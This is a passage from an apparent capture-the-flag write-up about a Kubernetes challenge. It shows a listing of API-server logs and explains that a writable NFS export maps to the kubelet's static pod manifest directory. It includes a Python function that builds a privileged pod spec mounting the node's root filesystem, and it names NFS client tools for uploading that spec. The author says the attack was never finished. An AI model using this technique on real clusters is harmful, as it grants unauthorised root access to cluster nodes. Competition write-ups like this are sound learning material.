| PERMISSION  UID  GID  SIZE     TIME                 FILENAME
| rwxr-xr-x   0    0    4096     2024-11-14T23:12:16  .
| ??????????  ?    ?    ?        ?                    ..
| rw-------   0    0    5242585  2024-11-14T22:26:23  kube-apiserver-2024-11-14T22-26-23.727.log
| rw-------   0    0    5242563  2024-11-14T22:49:40  kube-apiserver-2024-11-14T22-49-41.566.log
| rw-------   0    0    5242206  2024-11-14T23:12:16  kube-apiserver-2024-11-14T23-12-16.052.log
| rw-------   0    0    720718   2024-11-14T23:15:30  kube-apiserver.log
```

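Amazing. The /etc/kubernetes/manifests export allows Modify, Extend, and Delete, and that is the directory the kubelet on master-1 watches for static pod manifests (note etcd.yaml and kube-apiserver.yaml in there). If we can upload a file, we can drop in a spec for a privileged pod in the attacker namespace with volume mounts back to the host of our target node, and the kubelet will run it. Unfortunately, I wasn’t able to move past this step.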
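For reference, here is a minimal sketch of the kind of spec I had in mind, rendered from Python as JSON (JSON is also valid YAML, so it should be acceptable as a manifest file). The pod name, image, and host path are hypothetical placeholders, the image would have to be pullable from master-1, and I never got to test this against the challenge.

```python
import json


def static_pod_manifest(name: str, namespace: str, image: str, host_path: str = "/") -> str:
    """Render a privileged pod spec that mounts `host_path` from the node at /host."""
    pod = {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {"name": name, "namespace": namespace},
        "spec": {
            "containers": [{
                "name": name,
                "image": image,
                "command": ["sleep", "infinity"],  # keep the container alive
                "securityContext": {"privileged": True},
                "volumeMounts": [{"name": "host", "mountPath": "/host"}],
            }],
            # hostPath exposes the node's filesystem to the container.
            "volumes": [{"name": "host", "hostPath": {"path": host_path}}],
        },
    }
    return json.dumps(pod, indent=2)
```

For example, static_pod_manifest("hypothetical-pod", "e88wmxbmdfkvp2h945sgpnk7viy1f9la", "debian:latest") produces the file that would then need to be copied into the export.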

We don’t have permissions to mount the export remotely. What we want instead is the apt package libnfs-utils, which includes the nfs-cat, nfs-cp, and nfs-ls binaries for interacting with an NFSv4 server without mounting it.

[https://github.com/sahlberg/libnfs]

[https://packages.debian.org/sid/libnfs-utils]



Conclusion

Tons of fun! This was amazing!!! 3rd place ain’t bad baby!